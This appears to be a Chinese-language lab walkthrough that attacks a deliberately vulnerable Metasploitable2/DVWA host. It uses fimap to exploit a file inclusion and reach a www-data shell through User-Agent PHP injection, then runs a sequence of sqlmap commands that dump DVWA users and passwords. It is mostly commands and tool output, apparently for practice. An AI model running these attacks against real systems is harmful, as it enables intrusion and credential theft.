使用Fimap和metasploitable2文件包含漏洞测试
fimap
首先查看msf已经存在的漏洞:
root@kali:~# fimap -u 'http://192.168.136.130/lfi.php?page=index.php' --force-run
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim ([email protected])
SingleScan is testing URL: 'http://192.168.136.130/lfi.php?page=index.php'
[05:57:09] [OUT] Inspecting URL 'http://192.168.136.130/lfi.php?page=index.php'...
[05:57:09] [INFO] Fiddling around with URL...
[05:57:09] [OUT] [PHP] Possible file inclusion found! -> 'http://192.168.136.130/lfi.php?page=IzIjx0Ao' with Parameter 'page'.
[05:57:09] [OUT] [PHP] Identifying Vulnerability 'http://192.168.136.130/lfi.php?page=index.php' with Parameter 'page'...
[05:57:09] [INFO] Scriptpath received: '/var/www'
[05:57:09] [INFO] Operating System is 'Unix-Like'.
[05:57:09] [INFO] Testing file '/etc/passwd'...
[05:57:09] [INFO] Testing file '/proc/self/environ'...
[05:57:09] [INFO] Testing file 'php://input'...
[05:57:09] [INFO] Testing file '/var/log/apache2/access.log'...
[05:57:09] [INFO] Testing file '/var/log/apache/access.log'...
[05:57:09] [INFO] Testing file '/var/log/httpd/access.log'...
[05:57:09] [INFO] Testing file '/var/log/apache2/access_log'...
[05:57:09] [INFO] Testing file '/var/log/apache/access_log'...
[05:57:09] [INFO] Testing file '/var/log/httpd/access_log'...
[05:57:09] [INFO] Testing file '/apache/logs/access.log'...
[05:57:09] [INFO] Testing file '/apache/logs/access_log'...
[05:57:09] [INFO] Testing file '/apache2/logs/access.log'...
[05:57:09] [INFO] Testing file '/apache2/logs/access_log'...
[05:57:09] [INFO] Testing file '/etc/httpd/logs/access_log'...
[05:57:10] [INFO] Testing file '/etc/httpd/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/httpd/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/httpd/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/www/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/www/logs/access.log'...
[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access_log'...
[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access.log'...
[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access_log'...
[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access.log'...
[05:57:10] [INFO] Testing file '/var/log/access_log'...
[05:57:10] [INFO] Testing file '/var/log/access.log'...
[05:57:10] [INFO] Testing file '/logs/access.log'...
[05:57:10] [INFO] Testing file '/logs/access_log'...
[05:57:10] [INFO] Testing file '/opt/lampp/logs/access_log'...
[05:57:10] [INFO] Testing file '/opt/lampp/logs/access.log'...
[05:57:10] [INFO] Testing file '/opt/xampp/logs/access.log'...
[05:57:10] [INFO] Testing file '/opt/xampp/logs/access_log'...
[05:57:10] [INFO] Testing file '/var/log/auth.log'...
[05:57:10] [INFO] Testing file '/var/log/secure'...
[05:57:10] [INFO] Testing file 'http://www.tha-imax.de/fimap_testfiles/test'...
##################################################################
#[1] Possible PHP-File Inclusion #
##################################################################
#::REQUEST #
# [URL] http://192.168.136.130/lfi.php?page=index.php #
# [HEAD SENT] #
#::VULN INFO #
# [GET PARAM] page #
# [PATH] /var/www #
# [OS] Unix #
# [TYPE] Absolute Clean #
# [TRUNCATION] No Need. It's clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
# [1] /proc/self/environ #
# [2] /var/log/auth.log #
##################################################################
root@kali:~# clear
root@kali:~# fimap -x --force-run
fimap v.1.00_svn (My life for Aiur)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim ([email protected])
###########################
#:: List of Domains :: #
###########################
#[1] 192.168.136.130 #
#[q] Quit #
###########################
Choose Domain: 1
#####################################################################################################
#:: FI Bugs on '192.168.136.130' :: #
#####################################################################################################
#[1] URL: '/lfi.php?page=index.php' injecting file: '/proc/self/environ' using GET-param: 'page' #
#[2] URL: '/lfi.php?page=index.php' injecting file: '/var/log/auth.log' using GET-param: 'page' #
#[q] Quit #
#####################################################################################################
Choose vulnerable script: 1
[06:01:09] [INFO] Testing PHP-code injection thru User-Agent...
[06:01:09] [OUT] PHP Injection works! Testing if execution works...
[06:01:09] [INFO] Testing execution thru 'popen[b64]'...
[06:01:09] [OUT] Execution thru 'popen[b64]' works!
####################################################
#:: Available Attacks - PHP and SHELL access :: #
####################################################
#[1] Spawn fimap shell #
#[2] Spawn pentestmonkey's reverse shell #
#[3] [Test Plugin] Show some info #
#[q] Quit #
####################################################
Choose Attack: 1
Please wait - Setting up shell (one request)...
-------------------------------------------
Welcome to fimap shell!
Better don't start interactive commands! ;)
Also remember that this is not a persistent shell.
Every command opens a new shell and quits it after that!
Enter 'q' to exit the shell.
-------------------------------------------
fishell@www-data:/var/www$>
使用sqlmap和metasploitable2进行SQL注入实验
实验环境是kali的sqlmap和metasploit2.
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low'
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --current-user
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --current-db
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' -dbs
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' -users
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --table -D dvwa
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --column -T users -D dvwa
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --dump -C user,password -T users -D dvwa